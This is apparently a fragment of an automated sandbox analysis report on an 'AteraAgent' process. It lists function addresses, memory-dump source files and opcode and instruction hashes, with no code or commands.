                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 72c94ea793019962bc1303358a8601b2cc8c95067f4987fdc847a04041b3aac1
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: bbd6b3545a5fffc89f1abc1635b6d379240af3dd98692601f3cda3fe08cfaec5
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72c94ea793019962bc1303358a8601b2cc8c95067f4987fdc847a04041b3aac1
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E451F861B19E4F4FEBAC9B5C90A56F873D2EF98340B454079E41EC72E6EE25F9418340
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83E843 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 94c3797f9d56bf43810e829c094083c002f85e4fa7318546bf1289ff1621da16
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3e7ae76c7b9b460b1e5bc4353367c42c5ab65b955740010f3d205ed749d699e3
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94c3797f9d56bf43810e829c094083c002f85e4fa7318546bf1289ff1621da16
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6371B031719A898FEBA4EB2CC465BB577D1FF99300F0504B9E08EC72A6CE28BC458751
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6280DD Relevance: .2, Instructions: 219COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5205a17484489e57b6f3586b70ddfd4f3843825e0aff373802bcb9a830d68a2c
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2e05346c704f123194eec72f24ac13e2664f9ec14fd156b52e194fffa742d816
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5205a17484489e57b6f3586b70ddfd4f3843825e0aff373802bcb9a830d68a2c
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72814F30E0965E8EEB64DFA8C8657FDBBB0EF55300F5001BAD059E72D6CA342985CB51
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83F551 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b4516466f50a08468f6e0f4ab73b8a1af5ba1e227680104f3fa5b5a9ca1cc0b0
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8861b86d254bb04d276ee772e7198720a6b82e80e08147018977156f5301a12b
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4516466f50a08468f6e0f4ab73b8a1af5ba1e227680104f3fa5b5a9ca1cc0b0
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79612E71A1EA4D8FDF94EF58C8A5AB93BE1FF6D340F450169E449C32A1CA34E941CB81
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B624C41 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: bfd55c36f953f5532e3b5c4dcdc6910df64db1bb8ff3bdaa2d3b061ff8faa603
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 78d68cb0bccd0e526651bcdef328439296a85d29bbafa4c713fd627956e66d6c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfd55c36f953f5532e3b5c4dcdc6910df64db1bb8ff3bdaa2d3b061ff8faa603
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B51C871A0AA4D4FFBA5DF68C8657A87BB1EF46340F0105BAD05DDB29ACE346D81C700
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B625B6A Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 007f30350234eea4f6030ec6b38669c520cb8b4b2beb828b01e0a4c355006e4a
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9759e85d194fa764382aff1ab35d95d505808478b49a86f3ec3016c9f99eb048
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 007f30350234eea4f6030ec6b38669c520cb8b4b2beb828b01e0a4c355006e4a
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5561D63050E6894FE756CB68C864BD57FF1EF4B340F1501EAD088DB2A2CA345D86CB10
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B634090 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f028a11d13a6af543a516c53034792cf4e00b4ad6fe9c317e138fd810fc21630
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4ca7ba6bcb188422dc9f04f904637edf98ceede852335cc9a3c3981f8a99a8ad
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f028a11d13a6af543a516c53034792cf4e00b4ad6fe9c317e138fd810fc21630
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37518593F0F6C70BE775579868B54F96BA0DF51264B4A01BFD0EC8E0B3DD093A1A8251
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83A20A Relevance: .2, Instructions: 187COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9de6a189272d41aea0f8431b97389e9925d8eb78ca18ac7c38cd3ba4704164ab
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 35e401e272ed07883f2705cc7bcf6f0c54aa7134b10441845fee3dffa90ed448
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9de6a189272d41aea0f8431b97389e9925d8eb78ca18ac7c38cd3ba4704164ab
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1551692071DA4E0FE768D77880656B877E2EF49300F0540FAD44ECB2E7C92E79828350
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83F692 Relevance: .2, Instructions: 180COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 43769e2b3bbf6f7191c814ae4ff67b0ade57e21ca56d9fdb68b837cad95a3efe
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b433bf1292007dad0694b214e23b7142e13a06307b4ef63c27d473d0294f12e7
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43769e2b3bbf6f7191c814ae4ff67b0ade57e21ca56d9fdb68b837cad95a3efe
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1451F73061DA4D8FDFE8EF18C861AB937E2FFAC740B150569E44DC33A1CA24E9418B81
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B628AA5 Relevance: .2, Instructions: 177COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b4fa0f3760e72ea3a28019cd442cf2cd6ebf96f39d0ea5b48cd2dfb8a2e597e0
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 30237e56f8cbf8b78201763cc957a7b4cdc17a7154d9ff666a6fb841c330590f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4fa0f3760e72ea3a28019cd442cf2cd6ebf96f39d0ea5b48cd2dfb8a2e597e0
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2551D870E0E68D4FEB55DBA888616E97FF0FF46301F0501BAD059DB2E6CA382942C751
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B830FF4 Relevance: .2, Instructions: 175COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9697178fad853267844468ee6ab80582f8f23e846170fbfb1238aba38205b0d2
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0e2595d9ea7167ce03ead878545d9d1b2de64062433a7421f16dc4d244790ede
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9697178fad853267844468ee6ab80582f8f23e846170fbfb1238aba38205b0d2
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9741F230B1DF4D4FDB68EB5C84265B977E2FB98B10B14427AE449C3269DE20FC028781
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B840D27 Relevance: .2, Instructions: 174COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 172c5553ea2c4cf22e418f90d1b403ef05f7227d6d09dd21e5fb73aabec6d7d2
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1c27bb777ff7ece87a0b6932c4f68489cfd4a326900919f950ef64a4d1657cde
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 172c5553ea2c4cf22e418f90d1b403ef05f7227d6d09dd21e5fb73aabec6d7d2
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB512B22B1DB9B1FD759DB7C94A54B13FA1EF5920430942FAD49DCB197EE14B8068380
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63E8DB Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: aad2a2cfc2a76792af23303a1016d4459db13dcf7e5af0c74ee0bc992c841139
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3468c7d77c35978c2ade2f214e3d41d12f6b87f20e470b583a603647b414b187
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aad2a2cfc2a76792af23303a1016d4459db13dcf7e5af0c74ee0bc992c841139
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E51E521B09E4D4FEB98EB6C84A5B6437D1EF69300B0541F9D49DCB2E7DD14BC458351
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B633C30 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7c0e0711b538f8d88d466df55e4c3ff5c4a5daa10749d14c0050601d5352703c
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5c2035a00211ea0bf80471698afe76b851a22922c1ade7b137a2ed2c03220579
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c0e0711b538f8d88d466df55e4c3ff5c4a5daa10749d14c0050601d5352703c
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E541E33171AE0E4FD7649B58C894A61B3E1FF98300B55067DD46DCB2A6DA3AF982C780
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B635A19 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: d03aa529ac192cc3bc8fa9c1f149f6179a43a0ea668015e11a9b16c1db4de842
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 040de6311c799f753bdb1e43d6c50e0dcfe77c09d89a0f0427d4e30a0392b282
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d03aa529ac192cc3bc8fa9c1f149f6179a43a0ea668015e11a9b16c1db4de842
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F41E71170EA8E0FF7AAA76C58616707BD1DF8A351B0901FBE099CB2E7CC197D458351
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63B19F Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: fd140d5ae8bfa34195c9da432aa26c753595e2e6ac0ab6169fa4ed23926697b8
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5e6152eb009210f170133deef6da19648dd4c5d3a14e28e0d4f2b015b578dd59
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd140d5ae8bfa34195c9da432aa26c753595e2e6ac0ab6169fa4ed23926697b8
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82516A31E0964D8FDB55DFA8D8A06EDB7F1FF99300F04013AE019E7296CA386905CB51
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62EAD5 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 00c1cd29710dcce4fd7ca95cf4b47dfb4fb5963d6fee89507a952e5152c1b77b
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: fdeeb26d5cdb21584eb8ab9bcf53dff47d6a9865dd89889140ff19b5b0281a8f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00c1cd29710dcce4fd7ca95cf4b47dfb4fb5963d6fee89507a952e5152c1b77b
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33412736F0D68D4BF768AB6CE8655ED77A0EF51312F0001BBD19DCA1A3DE2439478640
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B8316DC Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c3e389fdf3953e663a5ab05327f8b3a03160d74bab7ff8de17e8ffe9d5bee651
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 692750d9d789b0de9550b4cf3c9b01899a63e6291c08190981a841829836af0a
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3e389fdf3953e663a5ab05327f8b3a03160d74bab7ff8de17e8ffe9d5bee651
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A641C671F0AA4D4FEBA8DB6884A57B473E1EF98701F1540BAD44DC33A9DE34AD828740
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6361D9 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 11c50bd511adaa64934337c5ce245dfbcb10b4ed71bae1f6096dc031fd439248
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2ba83275a85d527a03c4e8db5256bcb5c492318890eaac79545d51f410bd2fd8
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11c50bd511adaa64934337c5ce245dfbcb10b4ed71bae1f6096dc031fd439248
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D41F831B0EA890FE769A76C98686743FE1EF5A31070A01FAD49DCB1B7DD28EC018341
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B623C3D Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: add777cf35ac7818f0b9119473ef29d84b11d5935fe36056ed437c3073baa411
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1c9b5c475a0ef4ae1c2aa480f570a24b85d9fad8d5730dd868efab4c85063ce1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: add777cf35ac7818f0b9119473ef29d84b11d5935fe36056ed437c3073baa411
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27419F30E0AA4D8FEB54DFA8C8656EDBBB1FF59300F05017AD459DB2A6CB386941CB40
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62BAF3 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: fae3a2b647f7fa79dcd59f747d4ff463654e023ed8834800bd0983a8733037b3
